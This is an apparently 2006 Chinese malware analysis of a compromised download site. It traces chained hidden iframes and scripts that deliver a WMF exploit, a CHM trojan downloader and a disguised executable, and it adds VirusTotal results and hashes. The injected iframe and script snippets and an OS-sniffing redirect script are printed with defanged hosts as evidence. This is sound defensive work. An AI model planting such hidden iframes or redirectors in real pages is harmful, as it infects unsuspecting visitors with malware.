endurer原创
2006-05-10第1版
在网站hxxp://www.***23down.cn 的代码中包含:
〈frame name="header" scrolling="no" noresize target="main" src="top.htm"〉
hxxp://www.***23down.cn/top.htm的代码中包含:
〈script language="javascript" type="text/javascript" src="hxxp://js.***a.dx03.51.la/1707.js"〉〈/script〉
〈script language=javascript src=hxxp://www.***475100.com/1.js〉〈/script〉
hxxp://www.***475100.com/1.js的代码中包含:
document.writeln("〈iframe id=\"baidufttrame\" border=\"0\" vspace=\"0\" hspace=\"0\" marginwidth=\"0\" marginheight=\"0\" framespacing=\"0\" frameborder=\"0\" scrolling=\"no\" width=\"0\" height=\"0\" src=\"http:\/\/www.***475100.com\/bd\/index.htm\"〉〈\/iframe〉")
hxxp://www.***475100.com/bd/index.htm的代码:
〈iframe height="0" width="0" src="hxxp://www.***475100.com/mm.wmf"〉〈/iframe〉
〈iframe height="0" width="0" src="hxxp://www.***475100.com/bd/icyfox.htm"〉〈/iframe〉
〈iframe height="0" width="0" src="hxxp://www.***475100.com/xx/"〉〈/iframe〉
〈iframe src="mm.html" name="zhu" width="0" height="0" frameborder="0"〉〈/iframe〉
〈iframe src="joke.htm" name="zhu" width="0" height="0" frameborder="0"〉〈/iframe〉
〈iframe src="免费色情电影播放器.exe" name="zhu" width="0" height="0" frameborder="0"〉〈/iframe〉
mm.wmf江民KV报为:Exploit.WMF.SetAbortProc
Complete scanning result of "mm.wmf", received in VirusTotal at 05.10.2006, 16:03:09 (CET).
Antivirus
Version
Update
Result
AntiVir
6.34.1.27
05.10.2006
EXP/MS06-001.WMF
Avast
4.6.695.0
05.10.2006
MS06-001 WMF Exploit
AVG
386
05.09.2006
May be infected by unknown virus Exploit.WMF
BitDefender
7.2
05.10.2006
Exploit.Win32.WMF-PFV
CAT-QuickHeal
8.00
05.09.2006
WMF.Exploit
ClamAV
devel-20060426
05.10.2006
Exploit.WMF.A
DrWeb
4.33
05.10.2006
Exploit.MS05-053
eTrust-InoculateIT
23.72.4
05.10.2006
Win32/Worfo.Variant!Trojan
eTrust-Vet
12.4.2203
05.10.2006
Win32/Worfo
Ewido
3.5
05.10.2006
Exploit.MS05-053-WMF
Fortinet
2.76.0.0
05.10.2006
suspicious
F-Prot
3.16c
05.09.2006
no virus found
Ikarus
0.2.65.0
05.10.2006
Exploit.IMG-WMF
Kaspersky
4.0.2.24
05.10.2006
Exploit.Win32.IMG-WMF.u
McAfee
4758
05.09.2006
Exploit-WMF
Microsoft
1.1372
05.10.2006
TrojanDownloader:Win32/Wmfpfv
NOD32v2
1.1529
05.10.2006
a variant of Win32/Exploit.WMF
Norman
5.90.17
05.10.2006
W32/Exploit.Gen
Panda
9.0.0.4
05.10.2006
Exploit/Metafile
Sophos
4.05.0
05.10.2006
Exp/WMF-A
Symantec
8.0
05.10.2006
Trojan.Ducky.B
TheHacker
5.9.7.141
05.10.2006
Exploit/WMF
UNA
1.83
05.06.2006
Exploit.WMF.IMG
VBA32
3.11.0
05.09.2006
Exploit.WMF
Aditional Information
File size: 17253 bytes
MD5: eeab0824a7a4e53dabddfc019501e5f5
SHA1: fce0693db77cb47025e707f682d9df33ab752f12
icyfox.htm江民KV报为:Exploit.MHtRedir
icyfox.htm会下载运行icyfox.js
icyfox.js是个CHM文件,会释放/运行EXE文件,江民KV2006-05-10的病毒库不能查杀
Complete scanning result of "icyfox.js", received in VirusTotal at 05.10.2006, 16:18:28 (CET).
Antivirus
Version
Update
Result
AntiVir
6.34.1.27
05.10.2006
TR/Dldr.Small.TZ.49
Avast
4.6.695.0
05.10.2006
Win32:Trojano-3583
AVG
386
05.09.2006
no virus found
BitDefender
7.2
05.10.2006
Trojan.Downloader.Small.NB
CAT-QuickHeal
8.00
05.09.2006
TrojanDownloader.Small.tz
ClamAV
devel-20060426
05.10.2006
no virus found
DrWeb
4.33
05.10.2006
Trojan.DownLoader.2791
eTrust-InoculateIT
23.72.4
05.10.2006
Win32/SillyDL.7fl!Trojan
eTrust-Vet
12.4.2203
05.10.2006
no virus found
Ewido
3.5
05.10.2006
no virus found
Fortinet
2.76.0.0
05.10.2006
no virus found
F-Prot
3.16c
05.09.2006
no virus found
Ikarus
0.2.65.0
05.10.2006
no virus found
Kaspersky
4.0.2.24
05.10.2006
Trojan-Downloader.Win32.Small.tz
McAfee
4758
05.09.2006
Exploit-CodeBase.chm
Microsoft
1.1372
05.10.2006
TrojanDownloader:Win32/Small!3817
NOD32v2
1.1529
05.10.2006
Win32/TrojanDownloader.Small.TZ
Norman
5.90.17
05.10.2006
no virus found
Panda
9.0.0.4
05.10.2006
Suspicious file
Sophos
4.05.0
05.10.2006
Troj/Small-BDM
Symantec
8.0
05.10.2006
no virus found
TheHacker
5.9.7.141
05.10.2006
no virus found
UNA
1.83
05.06.2006
no virus found
VBA32
3.11.0
05.09.2006
Trojan-Downloader.Win32.Small.tz
Aditional Information
File size: 9676 bytes
MD5: 2f3c8d0f3c5cc12cc221c78701811517
SHA1: 98b848f95f2319369837e0a7fb4d4c48dd6e59dd
joke.htm江民KV报为:Exploit.VBS.Phel.bc
免费色情电影播放器.exe包含三个文件:
lsasss.exe江民KV报为:Trojan/VB.Small.bi
QQ.Exe江民KV报为: TrojanDownloader.MiniQrz
hy.exe江民KV报为:TrojanDownloader.MiniQrz
hxxp://www.***475100.com/xx/的代码为:
〈script language=javascript〉ie='wxp';ver=navigator.appVersion;if(!(ver.indexOf('NT
5.0')==-1))ie='wnt';if(!(ver.indexOf('Windows
98')==-1)){ie='w98';}location.href=ie+'.htm';〈/script〉
根据Windows和IE的版本,相应的下载wxp.htm、wnt.htm或w98.htm
wxp.htm、wnt.htm或w98.htm的内容经过Encode()和Escape()加密,会下载/运行:
1) hxxp://www.***475100.com/xx//dongfang.gif
dongfang.gif是个用eval()加密的脚本。
2) 打开hxxp://www.***5173a.com/door/index.htm
hxxp://www.***5173a.com/door/index.htm的内容为:
〈script language=javascript〉ie='winxp';ver=navigator.appVersion;if(!(ver.indexOf('NT 5.0')==-1))ie='winnt';if(!(ver.indexOf('Windows 98')==-1)){ie='w98';}location.href=ie+'.htm';〈/script〉
〈script src='http://s37.cnzz.com/stat.php?id=121168&web_id=121168' language='JavaScript' charset='gb2312'〉〈/script〉
根据Windows和IE的版本,相应的下载winxp.htm、winnt.htm或w98.htm